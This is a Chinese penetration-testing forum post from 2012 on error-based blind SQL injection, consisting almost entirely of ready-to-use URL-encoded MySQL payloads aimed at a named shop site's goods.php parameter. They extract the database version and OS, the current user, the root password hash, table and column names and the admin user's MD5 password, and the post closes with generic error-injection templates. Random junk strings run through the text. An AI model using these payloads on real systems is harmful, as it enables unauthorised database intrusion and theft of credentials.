找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2142|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
, M0 t/ p4 D3 C" n$ x* ?1 Fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 Z) Q, d4 P. |

; t6 b" S& i) w& Y判断系统' N) P  k- m0 u2 T( f# F
0 n6 v. ]! S6 J1 |
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 N9 s; ^/ g0 y
! Z, r5 M1 x1 B7 @* }  e

: i. F5 @$ f2 c0 x7 F  H, h/ V0 Y8 P2 Z% X6 Y
当前 user()
/ \# a" v. ~; Q, f2 g, l2 j) t  Q, k$ @8 u
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. \6 N* s7 s7 n3 E  l! h" P5 |4 Y

) s8 S; z% H0 L$ X. \6 W7 j7 u& g: }. `# f9 C, o3 c
! N7 S2 S$ q  R/ l# f; L3 E) ^
当前 database()
3 r) p" T6 X( Q$ V' |$ [http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
+ P$ n/ K9 S* E7 }. n5 ?+ n$ ~$ W# r( k& Q- ^
( C9 x% F% }, g5 S
4 P, F! w% o0 W4 ~* e

& O6 z  n; m3 J& [% l" Aroot hash
, {8 \7 E. X6 @4 [' L. Q. d
9 y4 w9 ^" R- d9 G. Khttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. I$ c! |/ [7 e7 T% r  }
3 m. E& n  C0 Z: _( U
: c. n& z5 y2 a, ?! M+ e! a- ]+ E" p$ o; q2 b0 b" b
当前 数据库表名
; c6 |, J4 x' X; O) Y3 P
; ~- K% v  p: R2 P/ R& {http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23/ x2 {& N- D) T2 x# N

) F9 T* o: J& V. w1 ~: ?) g0 \' O% H
1 [9 [# G- w  W6 _6 ]; H- Y3 }/ W  X+ F9 _% \8 m
当前 数据库 user_name 字段
. [2 d' E" \" k% P2 z' j. _8 ~& l. B% ]2 F4 H
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 Z* _4 r% M* V* S  a# K+ D

4 h  S3 s- t7 b当前 数据库 字段 password
# |, `% f9 z1 y, d/ U/ T" zhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
5 Z4 {$ h* O0 h- C# b3 b% B" }$ d8 d+ e; o
1 T, \6 V1 h( y- j" S7 X. r' q; f* w
; z5 ?% P4 z" A' K
获得 admin passwd(md5)" a: C: N. O" ^9 r% C( C7 A
6 Q0 Z. \1 j$ \8 M* X, k  f

6 E1 o7 C) {1 k( Jhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%236 i0 T  b: e: V6 `

% \) u: M4 o  `$ ^报错注射2 ?; i, p8 \7 F: c
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
! v5 q$ h% T3 d( ^
4 H; {2 e  |" Y, Z: G3 dSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
* x% ?; n' J7 |% d( E2 |# f
9 Y" c- [, J* x/ e0 f' A' jand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表